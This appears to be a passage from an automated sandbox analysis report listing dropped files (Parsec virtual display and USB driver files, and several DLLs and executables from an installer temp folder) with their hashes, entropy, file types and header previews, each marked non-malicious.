                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11928
                              Entropy (8bit):7.349994571032463
                              Encrypted:false
                              SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                              MD5:1FE1FC7CC73FB17E995D65835D51CA94
                              SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                              SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                              SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):173736
                              Entropy (8bit):6.232270251717221
                              Encrypted:false
                              SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                              MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                              SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                              SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                              SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):4122
                              Entropy (8bit):3.7080252993527285
                              Encrypted:false
                              SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                              MD5:D8030AFE09A2F984BE00389B31F7039B
                              SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                              SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                              SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                              Malicious:false
                              Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11928
                              Entropy (8bit):7.349994571032463
                              Encrypted:false
                              SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                              MD5:1FE1FC7CC73FB17E995D65835D51CA94
                              SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                              SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                              SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):173736
                              Entropy (8bit):6.232270251717221
                              Encrypted:false
                              SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                              MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                              SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                              SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                              SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):4122
                              Entropy (8bit):3.7080252993527285
                              Encrypted:false
                              SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                              MD5:D8030AFE09A2F984BE00389B31F7039B
                              SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                              SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                              SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                              Malicious:false
                              Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1841664
                              Entropy (8bit):6.286587259470902
                              Encrypted:false
                              SSDEEP:24576:E8sHeHKHplfu94i55tbhris2CCEnWaWBvYyozGUIjnRnU:E8Y/Q94iZNrP2t0ZyyIjnRnU
                              MD5:4E35A902CA8ED1C3D4551B1A470C4655
                              SHA1:AD9A9B5DBE810A6D7EA2C8430C32417D87C5930C
                              SHA-256:77222E81CB7004E8C3E077AADA02B555A3D38FB05B50C64AFD36CA230A8FD5B9
                              SHA-512:C7966F892C1F81FBE6A2197BD229904D398A299C53C24586CA77F7F657529323E5A7260ED32DA9701FCE9989B0B9A2463CD45C5A5D77E56A1EA670E02E575A30
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..07.sc7.sc7.scA-.c6.scA-.c<.sc7.rcR.scA-.c.sc!.wb4.scA-.c..sc..pb0.scA-.c6.scA-.c6.scA-.c6.scRich7.sc................PE..d....\.d.........." ................pe....................................................`..........................................-.......$..x................1...............!...................................................................................text...]........................... ..`.rdata...^.......`..................@..@.data........0......."..............@....pdata...1.......2...(..............@..@.rsrc................Z..............@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):557056
                              Entropy (8bit):6.204396774559151
                              Encrypted:false
                              SSDEEP:6144:mE7cV3iwbAFRWAbd4nf0H05yqE6Hl0ChW0+ksllAXBu0lWGWUJJQ4t0BHQQf+L+G:d7a3iwbihym2g7XO3LWUQfh4Co
                              MD5:9A1DD1D96481D61934DCC2D568971D06
                              SHA1:F136EF9BF8BD2FC753292FB5B7CF173A22675FB3
                              SHA-256:8CEBB25E240DB3B6986FCAED6BC0B900FA09DAD763A56FB71273529266C5C525
                              SHA-512:7AC1581F8A29E778BA1A1220670796C47FA5B838417F8F635E2CB1998A01515CFF3EE57045DACB78A8EC70D43754B970743ABA600379FE6D9481958D32D8A5AA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...........................................`.....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):120832
                              Entropy (8bit):6.452660436286688
                              Encrypted:false
                              SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                              MD5:267A42F3D8CDF6FCE02BFDA76A724120
                              SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                              SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                              SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3828878559559703
                              Encrypted:false
                              SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                              MD5:E27BB683A96D3C2338FB46385AB7F2FB
                              SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                              SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                              SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):356864
                              Entropy (8bit):6.703452536404214
                              Encrypted:false
                              SSDEEP:6144:a/SEW2qJHtVqYEJ6pdMZT6KWm1xA+Mko22Anui5j:kI9tV3EMpdQGRwA+92Uj
                              MD5:7C220C7186368E299FA81FBFF8290064
                              SHA1:F18BB3A1ADF29F8CF556B4D02D44F668537964F6
                              SHA-256:742395A3BBB5700067955BA70E29BE33C45C35A25705A071B472FDBBB1523070
                              SHA-512:48CA2D90714E071357B8CDAE2883633F78964D85ED1C45883794A42F160B754110050E7D5706F7C359448D45F2B8627CF2999D4351302A7073F8D930C101C50B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6@..r!..r!..r!..{Ys..!..fJ.c!..r!.. ..fJ.a!..fJ.x!..fJ.v!..fJ..s!..fJ.[!..fJ..s!..fJ.s!..Richr!..........................PE..L...h>.............!.....|................................................................@A.............................................p...................p..TI.. m..T............................ ..........................@....................text....{.......|.................. ..`.data...T...........................@....idata..^0.......2..................@..@.didat..............................@....rsrc....p.......r..................@..@.reloc..TI...p...J...(..............@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):888832
                              Entropy (8bit):6.658891755289535
                              Encrypted:false
                              SSDEEP:12288:qq+D5IECD3N0TU++ekdhBHUESG+IAafpR2hZz8PC2CQh3Y+EkwVWFvhXX:fECD9j++ekR0JG5AaBmzqhpY+ELUhH
                              MD5:5E7C062BDE54ED88A639A889A1695318
                              SHA1:3A8548093D0E795FBF5E3C972D1EF28CEA76374D
                              SHA-256:318CA8E2AE5ECDBB0A7E10AE90B317C09D9C425758D530FFD54110CE1121088C
